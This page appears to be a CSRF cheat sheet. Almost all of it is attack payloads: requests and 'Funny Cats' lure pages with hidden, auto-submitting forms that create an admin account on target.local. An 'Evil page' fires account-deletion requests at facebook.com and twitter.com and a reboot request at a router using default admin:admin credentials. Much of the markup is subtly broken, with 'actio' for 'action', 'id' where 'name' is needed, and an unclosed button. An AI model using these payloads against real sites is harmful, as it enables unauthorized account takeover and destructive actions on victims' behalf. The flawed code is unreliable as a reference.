Skip to content

CSRF

  • GET - CSRF
  • POST - CSRF
  • PUT -
  • DELETE -
  • PATCH -

GET

GET http://target.local/admin/?user=hacker&pass=hacker123&group=1

<form actio="/admin" method="GET">
  <input id=user />
  <input id=pass/>
  <input id=group/>
  <button type="submit">
</form>

<html>
<h1>Funny Cats</h1>
<img src="http://target.local/admin/?user=hacker&pass=hacker123&group=1"/>
</html>

POST

POST /admin/
Host: target.local
Content-Type: application/x-www-form-urlencoded

user=hacker&pass=hacker123&group=1

<html>
<h1>Funny Cats</h1>
<form actio="http://target.local/admin/" method="POST">
  <input type="hidden" id=user value="hacker"/>
  <input type="hidden" id=pass value="hacker123"/>
  <input type="hidden" id=group value="1"/>
  <button type="submit" value="click to see more cats"/>
</form>
</html>

<html>
<h1>Funny Cats</h1>
<form class="hid" actio="http://target.local/admin/" method="POST" onload="form.submit()">
  <input type="hidden" id=user value="hacker"/>
  <input type="hidden" id=pass value="hacker123"/>
  <input type="hidden" id=group value="1"/>
  <button type="submit" value="click to see more cats"/>
</form>
</html>

<html>
<h1>Funny Cats</h1>
<form class="hid" actio="http://target.local/admin/" method="POST">
  <input type="hidden" id=user value="hacker"/>
  <input type="hidden" id=pass value="hacker123"/>
  <input type="hidden" id=group value="1"/>
  <button type="submit" value="click to see more cats"/>
</form>
<script>form.submit()</script>
</html>

<html>
<h1>Evil page</h1>
<img src="https://facebook.com/?user_delete_without_confirmation"/>
<img src="https://twitter.com/?user_delete_without_confirmation"/>
<img src="http://admin:admin@192.168.0.1/reboot"/>
</html>

POST

POST /admin/
Host: target.local
Content-Type: application/x-www-form-urlencoded
Cookie: SESSION=4324234234324
Cookie: XSRF_TOKEN=jvrh3nuihfihsdj2v783rbver2uvrbef

user=hacker&pass=hacker123&group=1&xsrf=??????????????????

<html>
<h1>Funny Cats</h1>
<form actio="http://target.local/admin/" method="POST">
  <input type="hidden" id=xsrf value="??????????????????????????"/>
  <input type="hidden" id=user value="hacker"/>
  <input type="hidden" id=pass value="hacker123"/>
  <input type="hidden" id=group value="1"/>
  <button type="submit" value="click to see more cats"/>
</form>
</html>